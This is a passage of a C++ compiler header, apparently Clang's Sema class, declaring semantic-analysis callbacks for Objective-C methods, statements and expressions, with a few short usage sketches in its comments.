/// handle creating the ObjCPropertyDecl for a category or \@interface.
ObjCPropertyDecl *CreatePropertyDecl(Scope *S,
ObjCContainerDecl *CDecl,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
const unsigned Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
/// AtomicPropertySetterGetterRules - This routine enforces the rule (via a
/// warning) that an atomic property which has one user-declared setter or
/// getter must also have the other one user-declared.
void AtomicPropertySetterGetterRules(ObjCImplDecl* IMPDecl,
ObjCInterfaceDecl* IDecl);
void DiagnoseOwningPropertyGetterSynthesis(const ObjCImplementationDecl *D);
void DiagnoseMissingDesignatedInitOverrides(
const ObjCImplementationDecl *ImplD,
const ObjCInterfaceDecl *IFD);
void DiagnoseDuplicateIvars(ObjCInterfaceDecl *ID, ObjCInterfaceDecl *SID);
enum MethodMatchStrategy {
MMS_loose,
MMS_strict
};
/// MatchTwoMethodDeclarations - Checks whether two methods' types match and
/// returns true or false accordingly.
bool MatchTwoMethodDeclarations(const ObjCMethodDecl *Method,
const ObjCMethodDecl *PrevMethod,
MethodMatchStrategy strategy = MMS_strict);
/// MatchAllMethodDeclarations - Check methods declared in an interface or
/// protocol against those declared in their implementations.
void MatchAllMethodDeclarations(const SelectorSet &InsMap,
const SelectorSet &ClsMap,
SelectorSet &InsMapSeen,
SelectorSet &ClsMapSeen,
ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool &IncompleteImpl,
bool ImmediateClass,
bool WarnCategoryMethodImpl=false);
/// CheckCategoryVsClassMethodMatches - Checks that methods implemented in a
/// category match those implemented in its primary class, and warns each time
/// an exact match is found.
void CheckCategoryVsClassMethodMatches(ObjCCategoryImplDecl *CatIMP);
/// Add the given method to the list of globally-known methods.
void addMethodToGlobalList(ObjCMethodList *List, ObjCMethodDecl *Method);
/// Returns the default address space for method qualifiers.
LangAS getDefaultCXXMethodAddrSpace() const;
private:
/// AddMethodToGlobalPool - Add an instance or factory method to the global
/// pool. See the description of AddInstanceMethodToGlobalPool.
void AddMethodToGlobalPool(ObjCMethodDecl *Method, bool impl, bool instance);
/// LookupMethodInGlobalPool - Returns the instance or factory method and
/// optionally warns if there are multiple signatures.
ObjCMethodDecl *LookupMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass,
bool instance);
public:
/// Returns instance or factory methods in the global method pool for the
/// given selector. It checks the desired kind first; if none is found and the
/// parameter CheckTheOther is set, it then checks the other kind. If no such
/// method, or only one method, is found, the function returns false;
/// otherwise, it returns true.
bool
CollectMultipleMethodsInGlobalPool(Selector Sel,
SmallVectorImpl<ObjCMethodDecl*>& Methods,
bool InstanceFirst, bool CheckTheOther,
const ObjCObjectType *TypeBound = nullptr);
bool
AreMultipleMethodsInGlobalPool(Selector Sel, ObjCMethodDecl *BestMethod,
SourceRange R, bool receiverIdOrClass,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
void
DiagnoseMultipleMethodInGlobalPool(SmallVectorImpl<ObjCMethodDecl*> &Methods,
Selector Sel, SourceRange R,
bool receiverIdOrClass);
private:
/// Returns the method which best matches the given argument list, or
/// nullptr if none could be found.
ObjCMethodDecl *SelectBestMethod(Selector Sel, MultiExprArg Args,
bool IsInstance,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
/// Record the typo correction failure and return an empty correction.
TypoCorrection FailedCorrection(IdentifierInfo *Typo, SourceLocation TypoLoc,
bool RecordFailure = true) {
if (RecordFailure)
TypoCorrectionFailures[Typo].insert(TypoLoc);
return TypoCorrection();
}
public:
/// AddInstanceMethodToGlobalPool - All instance methods in a translation
/// unit are added to a global pool. This allows us to efficiently associate
/// a selector with a method declaration for purposes of typechecking
/// messages sent to "id" (where the class of the object is unknown).
void AddInstanceMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/true);
}
/// AddFactoryMethodToGlobalPool - Same as above, but for factory methods.
void AddFactoryMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/false);
}
/// AddAnyMethodToGlobalPool - Add any method, instance or factory, to the
/// global pool.
void AddAnyMethodToGlobalPool(Decl *D);
/// LookupInstanceMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupInstanceMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/true);
}
/// LookupFactoryMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupFactoryMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/false);
}
const ObjCMethodDecl *SelectorsForTypoCorrection(Selector Sel,
QualType ObjectType=QualType());
/// LookupImplementedMethodInGlobalPool - Returns the method which has an
/// implementation.
ObjCMethodDecl *LookupImplementedMethodInGlobalPool(Selector Sel);
/// CollectIvarsToConstructOrDestruct - Collect those ivars which require
/// initialization.
void CollectIvarsToConstructOrDestruct(ObjCInterfaceDecl *OI,
SmallVectorImpl<ObjCIvarDecl*> &Ivars);
//===--------------------------------------------------------------------===//
// Statement Parsing Callbacks: SemaStmt.cpp.
public:
class FullExprArg {
public:
FullExprArg() : E(nullptr) { }
FullExprArg(Sema &actions) : E(nullptr) { }
ExprResult release() {
return E;
}
Expr *get() const { return E; }
Expr *operator->() {
return E;
}
private:
// FIXME: No need to make the entire Sema class a friend when it's just
// Sema::MakeFullExpr that needs access to the constructor below.
friend class Sema;
explicit FullExprArg(Expr *expr) : E(expr) {}
Expr *E;
};
FullExprArg MakeFullExpr(Expr *Arg) {
return MakeFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation());
}
FullExprArg MakeFullExpr(Expr *Arg, SourceLocation CC) {
return FullExprArg(
ActOnFinishFullExpr(Arg, CC, /*DiscardedValue*/ false).get());
}
FullExprArg MakeFullDiscardedValueExpr(Expr *Arg) {
ExprResult FE =
ActOnFinishFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation(),
/*DiscardedValue*/ true);
return FullExprArg(FE.get());
}
StmtResult ActOnExprStmt(ExprResult Arg, bool DiscardedValue = true);
StmtResult ActOnExprStmtError();
StmtResult ActOnNullStmt(SourceLocation SemiLoc,
bool HasLeadingEmptyMacro = false);
void ActOnStartOfCompoundStmt(bool IsStmtExpr);
void ActOnFinishOfCompoundStmt();
StmtResult ActOnCompoundStmt(SourceLocation L, SourceLocation R,
ArrayRef<Stmt *> Elts, bool isStmtExpr);
/// A RAII object to enter scope of a compound statement.
class CompoundScopeRAII {
public:
CompoundScopeRAII(Sema &S, bool IsStmtExpr = false) : S(S) {
S.ActOnStartOfCompoundStmt(IsStmtExpr);
}
~CompoundScopeRAII() {
S.ActOnFinishOfCompoundStmt();
}
private:
Sema &S;
};
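/// A minimal usage sketch (illustrative only; 'Actions' is the Sema instance
/// a parser typically holds):
/// \code
///   {
///     Sema::CompoundScopeRAII CompoundScope(Actions);
///     // ... process the statements of the compound statement ...
///   } // ActOnFinishOfCompoundStmt() runs here
/// \endcode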
/// An RAII helper that pops a function scope on exit.
struct FunctionScopeRAII {
Sema &S;
bool Active;
FunctionScopeRAII(Sema &S) : S(S), Active(true) {}
~FunctionScopeRAII() {
if (Active)
S.PopFunctionScopeInfo();
}
void disable() { Active = false; }
};
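/// A minimal usage sketch (illustrative only; 'ParseFailed' is a hypothetical
/// flag): pop the pushed function scope on every early exit, but keep it when
/// the scope is handed off on success.
/// \code
///   FunctionScopeRAII PopScope(*this); // pops in the destructor
///   if (ParseFailed)
///     return StmtError();              // scope popped automatically here
///   PopScope.disable();                // success: ownership handed off
/// \endcode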
StmtResult ActOnDeclStmt(DeclGroupPtrTy Decl,
SourceLocation StartLoc,
SourceLocation EndLoc);
void ActOnForEachDeclStmt(DeclGroupPtrTy Decl);
StmtResult ActOnForEachLValueExpr(Expr *E);
ExprResult ActOnCaseExpr(SourceLocation CaseLoc, ExprResult Val);
StmtResult ActOnCaseStmt(SourceLocation CaseLoc, ExprResult LHS,
SourceLocation DotDotDotLoc, ExprResult RHS,
SourceLocation ColonLoc);
void ActOnCaseStmtBody(Stmt *CaseStmt, Stmt *SubStmt);
StmtResult ActOnDefaultStmt(SourceLocation DefaultLoc,
SourceLocation ColonLoc,
Stmt *SubStmt, Scope *CurScope);
StmtResult ActOnLabelStmt(SourceLocation IdentLoc, LabelDecl *TheDecl,
SourceLocation ColonLoc, Stmt *SubStmt);
StmtResult ActOnAttributedStmt(SourceLocation AttrLoc,
ArrayRef<const Attr*> Attrs,
Stmt *SubStmt);
class ConditionResult;
StmtResult ActOnIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult BuildIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult ActOnStartOfSwitchStmt(SourceLocation SwitchLoc,
Stmt *InitStmt,
ConditionResult Cond);
StmtResult ActOnFinishSwitchStmt(SourceLocation SwitchLoc,
Stmt *Switch, Stmt *Body);
StmtResult ActOnWhileStmt(SourceLocation WhileLoc, ConditionResult Cond,
Stmt *Body);
StmtResult ActOnDoStmt(SourceLocation DoLoc, Stmt *Body,
SourceLocation WhileLoc, SourceLocation CondLParen,
Expr *Cond, SourceLocation CondRParen);
StmtResult ActOnForStmt(SourceLocation ForLoc,
SourceLocation LParenLoc,
Stmt *First,
ConditionResult Second,
FullExprArg Third,
SourceLocation RParenLoc,
Stmt *Body);
ExprResult CheckObjCForCollectionOperand(SourceLocation forLoc,
Expr *collection);
StmtResult ActOnObjCForCollectionStmt(SourceLocation ForColLoc,
Stmt *First, Expr *collection,
SourceLocation RParenLoc);
StmtResult FinishObjCForCollectionStmt(Stmt *ForCollection, Stmt *Body);
enum BuildForRangeKind {
/// Initial building of a for-range statement.
BFRK_Build,
/// Instantiation or recovery rebuild of a for-range statement. Don't
/// attempt any typo-correction.
BFRK_Rebuild,
/// Determining whether a for-range statement could be built. Avoid any
/// unnecessary or irreversible actions.
BFRK_Check
};
StmtResult ActOnCXXForRangeStmt(Scope *S, SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
Stmt *LoopVar,
SourceLocation ColonLoc, Expr *Collection,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult BuildCXXForRangeStmt(SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
SourceLocation ColonLoc,
Stmt *RangeDecl, Stmt *Begin, Stmt *End,
Expr *Cond, Expr *Inc,
Stmt *LoopVarDecl,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult FinishCXXForRangeStmt(Stmt *ForRange, Stmt *Body);
StmtResult ActOnGotoStmt(SourceLocation GotoLoc,
SourceLocation LabelLoc,
LabelDecl *TheDecl);
StmtResult ActOnIndirectGotoStmt(SourceLocation GotoLoc,
SourceLocation StarLoc,
Expr *DestExp);
StmtResult ActOnContinueStmt(SourceLocation ContinueLoc, Scope *CurScope);
StmtResult ActOnBreakStmt(SourceLocation BreakLoc, Scope *CurScope);
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind, unsigned NumParams);
typedef std::pair<StringRef, QualType> CapturedParamNameType;
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind,
ArrayRef<CapturedParamNameType> Params,
unsigned OpenMPCaptureLevel = 0);
StmtResult ActOnCapturedRegionEnd(Stmt *S);
void ActOnCapturedRegionError();
RecordDecl *CreateCapturedStmtRecordDecl(CapturedDecl *&CD,
SourceLocation Loc,
unsigned NumParams);
enum CopyElisionSemanticsKind {
CES_Strict = 0,
CES_AllowParameters = 1,
CES_AllowDifferentTypes = 2,
CES_AllowExceptionVariables = 4,
CES_FormerDefault = (CES_AllowParameters),
CES_Default = (CES_AllowParameters | CES_AllowDifferentTypes),
CES_AsIfByStdMove = (CES_AllowParameters | CES_AllowDifferentTypes |
CES_AllowExceptionVariables),
};
VarDecl *getCopyElisionCandidate(QualType ReturnType, Expr *E,
CopyElisionSemanticsKind CESK);
bool isCopyElisionCandidate(QualType ReturnType, const VarDecl *VD,
CopyElisionSemanticsKind CESK);
StmtResult ActOnReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp,
Scope *CurScope);
StmtResult BuildReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnCapScopeReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnGCCAsmStmt(SourceLocation AsmLoc, bool IsSimple,
bool IsVolatile, unsigned NumOutputs,
unsigned NumInputs, IdentifierInfo **Names,
MultiExprArg Constraints, MultiExprArg Exprs,
Expr *AsmString, MultiExprArg Clobbers,
unsigned NumLabels,
SourceLocation RParenLoc);
void FillInlineAsmIdentifierInfo(Expr *Res,
llvm::InlineAsmIdentifierInfo &Info);
ExprResult LookupInlineAsmIdentifier(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Id,
bool IsUnevaluatedContext);
bool LookupInlineAsmField(StringRef Base, StringRef Member,
unsigned &Offset, SourceLocation AsmLoc);
ExprResult LookupInlineAsmVarDeclField(Expr *RefExpr, StringRef Member,
SourceLocation AsmLoc);
StmtResult ActOnMSAsmStmt(SourceLocation AsmLoc, SourceLocation LBraceLoc,
ArrayRef<Token> AsmToks,
StringRef AsmString,
unsigned NumOutputs, unsigned NumInputs,
ArrayRef<StringRef> Constraints,
ArrayRef<StringRef> Clobbers,
ArrayRef<Expr*> Exprs,
SourceLocation EndLoc);
LabelDecl *GetOrCreateMSAsmLabel(StringRef ExternalLabelName,
SourceLocation Location,
bool AlwaysCreate);
VarDecl *BuildObjCExceptionDecl(TypeSourceInfo *TInfo, QualType ExceptionType,
SourceLocation StartLoc,
SourceLocation IdLoc, IdentifierInfo *Id,
bool Invalid = false);
Decl *ActOnObjCExceptionDecl(Scope *S, Declarator &D);
StmtResult ActOnObjCAtCatchStmt(SourceLocation AtLoc, SourceLocation RParen,
Decl *Parm, Stmt *Body);
StmtResult ActOnObjCAtFinallyStmt(SourceLocation AtLoc, Stmt *Body);
StmtResult ActOnObjCAtTryStmt(SourceLocation AtLoc, Stmt *Try,
MultiStmtArg Catch, Stmt *Finally);
StmtResult BuildObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw);
StmtResult ActOnObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw,
Scope *CurScope);
ExprResult ActOnObjCAtSynchronizedOperand(SourceLocation atLoc,
Expr *operand);
StmtResult ActOnObjCAtSynchronizedStmt(SourceLocation AtLoc,
Expr *SynchExpr,
Stmt *SynchBody);
StmtResult ActOnObjCAutoreleasePoolStmt(SourceLocation AtLoc, Stmt *Body);
VarDecl *BuildExceptionDeclaration(Scope *S, TypeSourceInfo *TInfo,
SourceLocation StartLoc,
SourceLocation IdLoc,
IdentifierInfo *Id);
Decl *ActOnExceptionDeclarator(Scope *S, Declarator &D);
StmtResult ActOnCXXCatchBlock(SourceLocation CatchLoc,
Decl *ExDecl, Stmt *HandlerBlock);
StmtResult ActOnCXXTryBlock(SourceLocation TryLoc, Stmt *TryBlock,
ArrayRef<Stmt *> Handlers);
StmtResult ActOnSEHTryBlock(bool IsCXXTry, // try (true) or __try (false) ?
SourceLocation TryLoc, Stmt *TryBlock,
Stmt *Handler);
StmtResult ActOnSEHExceptBlock(SourceLocation Loc,
Expr *FilterExpr,
Stmt *Block);
void ActOnStartSEHFinallyBlock();
void ActOnAbortSEHFinallyBlock();
StmtResult ActOnFinishSEHFinallyBlock(SourceLocation Loc, Stmt *Block);
StmtResult ActOnSEHLeaveStmt(SourceLocation Loc, Scope *CurScope);
void DiagnoseReturnInConstructorExceptionHandler(CXXTryStmt *TryBlock);
bool ShouldWarnIfUnusedFileScopedDecl(const DeclaratorDecl *D) const;
/// If it's a file-scoped decl that must warn if not used, keep track
/// of it.
void MarkUnusedFileScopedDecl(const DeclaratorDecl *D);
/// DiagnoseUnusedExprResult - If the statement passed in is an expression
/// whose result is unused, warn.
void DiagnoseUnusedExprResult(const Stmt *S);
void DiagnoseUnusedNestedTypedefs(const RecordDecl *D);
void DiagnoseUnusedDecl(const NamedDecl *ND);
/// Emit \p DiagID if the statement located at \p StmtLoc has a suspicious null
/// statement as its \p Body, and the body is located on the same line.
///
/// This helps prevent bugs due to typos, such as:
/// if (condition);
/// do_stuff();
void DiagnoseEmptyStmtBody(SourceLocation StmtLoc,
const Stmt *Body,
unsigned DiagID);
/// Warn if a for/while loop statement \p S, which is followed by
/// \p PossibleBody, has a suspicious null statement as a body.
void DiagnoseEmptyLoopBody(const Stmt *S,
const Stmt *PossibleBody);
/// Warn if a value is moved to itself.
void DiagnoseSelfMove(const Expr *LHSExpr, const Expr *RHSExpr,
SourceLocation OpLoc);
/// Warn if we're implicitly casting from a _Nullable pointer type to a
/// _Nonnull one.
void diagnoseNullableToNonnullConversion(QualType DstType, QualType SrcType,
SourceLocation Loc);
/// Warn when implicitly casting 0 to nullptr.
void diagnoseZeroToNullptrConversion(CastKind Kind, const Expr *E);
ParsingDeclState PushParsingDeclaration(sema::DelayedDiagnosticPool &pool) {
return DelayedDiagnostics.push(pool);
}
void PopParsingDeclaration(ParsingDeclState state, Decl *decl);
typedef ProcessingContextState ParsingClassState;
ParsingClassState PushParsingClass() {
ParsingClassDepth++;
return DelayedDiagnostics.pushUndelayed();
}
void PopParsingClass(ParsingClassState state) {
ParsingClassDepth--;
DelayedDiagnostics.popUndelayed(state);
}
void redelayDiagnostics(sema::DelayedDiagnosticPool &pool);
void DiagnoseAvailabilityOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass,
bool ObjCPropertyAccess,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
bool makeUnavailableInSystemHeader(SourceLocation loc,
UnavailableAttr::ImplicitReason reason);
/// Issue any -Wunguarded-availability warnings in \c FD
void DiagnoseUnguardedAvailabilityViolations(Decl *FD);
//===--------------------------------------------------------------------===//
// Expression Parsing Callbacks: SemaExpr.cpp.
bool CanUseDecl(NamedDecl *D, bool TreatUnavailableAsInvalid);
bool DiagnoseUseOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass = nullptr,
bool ObjCPropertyAccess = false,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
void NoteDeletedFunction(FunctionDecl *FD);
void NoteDeletedInheritingConstructor(CXXConstructorDecl *CD);
bool DiagnosePropertyAccessorMismatch(ObjCPropertyDecl *PD,
ObjCMethodDecl *Getter,
SourceLocation Loc);
void DiagnoseSentinelCalls(NamedDecl *D, SourceLocation Loc,
ArrayRef<Expr *> Args);
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, Decl *LambdaContextDecl = nullptr,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
enum ReuseLambdaContextDecl_t { ReuseLambdaContextDecl };
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, ReuseLambdaContextDecl_t,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
void PopExpressionEvaluationContext();
void DiscardCleanupsInEvaluationContext();
ExprResult TransformToPotentiallyEvaluated(Expr *E);
ExprResult HandleExprEvaluationContextForTypeof(Expr *E);
ExprResult CheckUnevaluatedOperand(Expr *E);
void CheckUnusedVolatileAssignment(Expr *E);
ExprResult ActOnConstantExpression(ExprResult Res);
// Functions for marking a declaration referenced. These functions also
// contain the relevant logic for marking if a reference to a function or
// variable is an odr-use (in the C++11 sense). There are separate variants
// for expressions referring to a decl; these exist because odr-use marking
// needs to be delayed for some constant variables when we build one of the
// named expressions.
//
// MightBeOdrUse indicates whether the use could possibly be an odr-use, and
// should usually be true. This only needs to be set to false if the lack of
// odr-use cannot be determined from the current context (for instance,
// because the name denotes a virtual function and was written without an
// explicit nested-name-specifier).
void MarkAnyDeclReferenced(SourceLocation Loc, Decl *D, bool MightBeOdrUse);
void MarkFunctionReferenced(SourceLocation Loc, FunctionDecl *Func,
bool MightBeOdrUse = true);
void MarkVariableReferenced(SourceLocation Loc, VarDecl *Var);
void MarkDeclRefReferenced(DeclRefExpr *E, const Expr *Base = nullptr);
void MarkMemberReferenced(MemberExpr *E);
void MarkFunctionParmPackReferenced(FunctionParmPackExpr *E);
void MarkCaptureUsedInEnclosingContext(VarDecl *Capture, SourceLocation Loc,
unsigned CapturingScopeIndex);
ExprResult CheckLValueToRValueConversionOperand(Expr *E);
void CleanupVarDeclMarking();
enum TryCaptureKind {
TryCapture_Implicit, TryCapture_ExplicitByVal, TryCapture_ExplicitByRef
};
/// Try to capture the given variable.
///
/// \param Var The variable to capture.
///
/// \param Loc The location at which the capture occurs.
///
/// \param Kind The kind of capture, which may be implicit (for either a
/// block or a lambda), or explicit by-value or by-reference (for a lambda).
///
/// \param EllipsisLoc The location of the ellipsis, if one is provided in
/// an explicit lambda capture.
///
/// \param BuildAndDiagnose Whether we are actually supposed to add the
/// captures or diagnose errors. If false, this routine merely checks whether
/// the capture can occur without performing the capture itself or complaining
/// if the variable cannot be captured.
///
/// \param CaptureType Will be set to the type of the field used to capture
/// this variable in the innermost block or lambda. Only valid when the
/// variable can be captured.
///
/// \param DeclRefType Will be set to the type of a reference to the capture
/// from within the current scope. Only valid when the variable can be
/// captured.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// variables that may or may not be used in certain specializations of
/// a nested generic lambda.
///
/// \returns true if an error occurred (i.e., the variable cannot be
/// captured) and false if the capture succeeded.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc, TryCaptureKind Kind,
SourceLocation EllipsisLoc, bool BuildAndDiagnose,
QualType &CaptureType,
QualType &DeclRefType,
const unsigned *const FunctionScopeIndexToStopAt);
/// Try to capture the given variable.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc,
TryCaptureKind Kind = TryCapture_Implicit,
SourceLocation EllipsisLoc = SourceLocation());
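/// A minimal usage sketch of the simple overload above (illustrative only;
/// it assumes a VarDecl 'Var' referenced at 'Loc' inside a lambda or block):
/// \code
///   if (tryCaptureVariable(Var, Loc)) // true means the capture failed
///     return ExprError();             // and an error was diagnosed
/// \endcode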
/// Checks if the variable must be captured.
bool NeedToCaptureVariable(VarDecl *Var, SourceLocation Loc);
/// Given a variable, determine the type that a reference to that
/// variable will have in the given scope.
QualType getCapturedDeclRefType(VarDecl *Var, SourceLocation Loc);
/// Mark all of the declarations referenced within a particular AST node as
/// referenced. Used when template instantiation instantiates a non-dependent
/// type -- entities referenced by the type are now referenced.
void MarkDeclarationsReferencedInType(SourceLocation Loc, QualType T);
void MarkDeclarationsReferencedInExpr(Expr *E,
bool SkipLocalVariables = false);
/// Try to recover by turning the given expression into a
/// call. Returns true if recovery was attempted or an error was
/// emitted; this may also leave the ExprResult invalid.
bool tryToRecoverWithCall(ExprResult &E, const PartialDiagnostic &PD,
bool ForceComplain = false,
bool (*IsPlausibleResult)(QualType) = nullptr);
/// Figure out if an expression could be turned into a call.
bool tryExprAsCall(Expr &E, QualType &ZeroArgCallReturnTy,
UnresolvedSetImpl &NonTemplateOverloads);
/// Conditionally issue a diagnostic based on the current
/// evaluation context.
///
/// \param Statement If Statement is non-null, delay reporting the
/// diagnostic until the function body is parsed, and then do a basic
/// reachability analysis to determine if the statement is reachable.
/// If it is unreachable, the diagnostic will not be emitted.
bool DiagRuntimeBehavior(SourceLocation Loc, const Stmt *Statement,
const PartialDiagnostic &PD);
/// Similar, but diagnostic is only produced if all the specified statements
/// are reachable.
bool DiagRuntimeBehavior(SourceLocation Loc, ArrayRef<const Stmt*> Stmts,
const PartialDiagnostic &PD);
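/// A minimal usage sketch (illustrative only): report a division by zero only
/// if the enclosing statement turns out to be reachable once the function
/// body has been parsed.
/// \code
///   DiagRuntimeBehavior(Loc, Statement, PDiag(diag::warn_division_by_zero));
/// \endcode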
// Primary Expressions.
SourceRange getExprRange(Expr *E) const;
ExprResult ActOnIdExpression(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
UnqualifiedId &Id, bool HasTrailingLParen, bool IsAddressOfOperand,
CorrectionCandidateCallback *CCC = nullptr,
bool IsInlineAsmIdentifier = false, Token *KeywordReplacement = nullptr);
void DecomposeUnqualifiedId(const UnqualifiedId &Id,
TemplateArgumentListInfo &Buffer,
DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *&TemplateArgs);
bool
DiagnoseEmptyLookup(Scope *S, CXXScopeSpec &SS, LookupResult &R,
CorrectionCandidateCallback &CCC,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
ArrayRef<Expr *> Args = None, TypoExpr **Out = nullptr);
DeclResult LookupIvarInObjCMethod(LookupResult &Lookup, Scope *S,
IdentifierInfo *II);
ExprResult BuildIvarRefExpr(Scope *S, SourceLocation Loc, ObjCIvarDecl *IV);
ExprResult LookupInObjCMethod(LookupResult &LookUp, Scope *S,
IdentifierInfo *II,
bool AllowBuiltinCreation=false);
ExprResult ActOnDependentIdExpression(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
bool isAddressOfOperand,
const TemplateArgumentListInfo *TemplateArgs);
/// If \p D cannot be odr-used in the current expression evaluation context,
/// return a reason explaining why. Otherwise, return NOUR_None.
NonOdrUseReason getNonOdrUseReasonInCurrentContext(ValueDecl *D);
DeclRefExpr *BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
SourceLocation Loc,
const CXXScopeSpec *SS = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
const CXXScopeSpec *SS = nullptr,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
NestedNameSpecifierLoc NNS,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
ExprResult
BuildAnonymousStructUnionMemberReference(
const CXXScopeSpec &SS,
SourceLocation nameLoc,
IndirectFieldDecl *indirectField,
DeclAccessPair FoundDecl = DeclAccessPair::make(nullptr, AS_none),
Expr *baseObjectExpr = nullptr,
SourceLocation opLoc = SourceLocation());
ExprResult BuildPossibleImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S);
ExprResult BuildImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
bool IsDefiniteInstance,
const Scope *S);
bool UseArgumentDependentLookup(const CXXScopeSpec &SS,
const LookupResult &R,
bool HasTrailingLParen);
ExprResult
BuildQualifiedDeclarationNameExpr(CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
bool IsAddressOfOperand, const Scope *S,
TypeSourceInfo **RecoveryTSI = nullptr);
ExprResult BuildDependentDeclRefExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildDeclarationNameExpr(const CXXScopeSpec &SS,
LookupResult &R,
bool NeedsADL,
bool AcceptInvalidDecl = false);
ExprResult BuildDeclarationNameExpr(
const CXXScopeSpec &SS, const DeclarationNameInfo &NameInfo, NamedDecl *D,
NamedDecl *FoundD = nullptr,
const TemplateArgumentListInfo *TemplateArgs = nullptr,
bool AcceptInvalidDecl = false);
ExprResult BuildLiteralOperatorCall(LookupResult &R,
DeclarationNameInfo &SuffixInfo,
ArrayRef<Expr *> Args,
SourceLocation LitEndLoc,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
ExprResult BuildPredefinedExpr(SourceLocation Loc,
PredefinedExpr::IdentKind IK);
ExprResult ActOnPredefinedExpr(SourceLocation Loc, tok::TokenKind Kind);
ExprResult ActOnIntegerConstant(SourceLocation Loc, uint64_t Val);
bool CheckLoopHintExpr(Expr *E, SourceLocation Loc);
ExprResult ActOnNumericConstant(const Token &Tok, Scope *UDLScope = nullptr);
ExprResult ActOnCharacterConstant(const Token &Tok,
Scope *UDLScope = nullptr);
ExprResult ActOnParenExpr(SourceLocation L, SourceLocation R, Expr *E);
ExprResult ActOnParenListExpr(SourceLocation L,
SourceLocation R,
MultiExprArg Val);
/// ActOnStringLiteral - The specified tokens were lexed as pasted string
/// fragments (e.g. "foo" "bar" L"baz").
ExprResult ActOnStringLiteral(ArrayRef<Token> StringToks,
Scope *UDLScope = nullptr);
ExprResult ActOnGenericSelectionExpr(SourceLocation KeyLoc,
